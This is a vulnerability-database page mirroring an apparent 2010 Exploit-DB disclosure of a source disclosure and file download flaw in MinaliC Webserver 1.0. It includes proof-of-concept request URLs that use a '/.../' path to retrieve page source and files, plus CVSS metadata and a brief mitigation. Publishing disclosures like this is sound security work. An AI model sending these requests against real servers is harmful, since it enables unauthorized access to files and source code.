MinaliC Webserver 1.0 Remote Source Disclosure/File Download

vendor:

Minalic Webserver

by:

Dr_IDE

7,5

CVSS

HIGH

Remote Source Disclosure

200

CWE

Product Name: Minalic Webserver

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:minalic:minalic_webserver

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2010

MinaliC Webserver 1.0 Remote Source Disclosure/File Download

MinialiC Webserver v1.0 is a Windows based HTTP server. This is the latest version of the application available. MinialiC Webserver v1.0 is vulnerable to common remote source disclosure attacks. An attacker can use the following URLs to access the source code of the web page or download files from the server: http://[ webserver IP][:port][/.../]index.html (Source Disclosure) and http://[ webserver IP][:port][/.../]logo.bmp (File Download).

Mitigation:

Disable directory browsing and ensure that all files are properly secured.

Source

Exploit-DB raw data:

###################################################################
#
# MinaliC Webserver 1.0 Remote Source Disclosure/File Download
# Found By: 	Dr_IDE
# Date:     	October 27, 2010
# Download:	    http://sourceforge.net/projects/minalic/
# Tested on:    Windows 7
# Greets:		edb team & John Leitch for finding the app
#
###################################################################
 
- Description -
 
MinialiC Webserver v1.0 is a Windows based HTTP server. This is the latest
version of the application available.
 
MinialiC Webserver v1.0 is vulnerable to common remote source disclosure attacks.
 
- Technical Details - (This is with Directory browsing = Off)
 
http://[ webserver IP][:port][/.../]index.html    (Source Disclosure)
http://[ webserver IP][:port][/.../]logo.bmp      (File Download)

http://localhost:8080/.../index.html
 
#[pocoftheday.blogspot.com]